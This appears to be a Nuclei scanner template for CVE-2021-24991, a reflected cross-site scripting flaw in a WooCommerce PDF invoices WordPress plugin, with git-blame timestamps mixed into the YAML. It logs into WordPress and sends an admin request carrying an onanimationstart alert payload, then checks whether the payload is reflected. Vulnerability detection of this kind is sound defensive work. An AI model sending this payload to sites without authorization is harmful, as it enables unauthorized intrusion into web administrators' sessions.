2022-02-08 01:07:19 +00:00
id : CVE-2021-24991
info :
2022-08-19 20:44:38 +00:00
name : WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting
2022-02-08 01:07:19 +00:00
author : cckuailong
severity : medium
2022-08-19 20:44:38 +00:00
description : The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.
2022-02-08 01:07:19 +00:00
reference :
2022-02-08 19:12:32 +00:00
- https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
2022-02-08 01:07:19 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24991
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score : 4.8
cve-id : CVE-2021-24991
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan
2022-02-08 01:07:19 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 19:12:32 +00:00
GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
2022-02-08 01:07:19 +00:00
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-08 19:12:32 +00:00
- "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
2022-02-08 01:07:19 +00:00
- "WooCommerce PDF Invoices"
condition : and
- type : status
status :
2022-02-08 19:12:32 +00:00
- 200
2022-08-19 20:44:38 +00:00
# Enhanced by cs 08/16/2022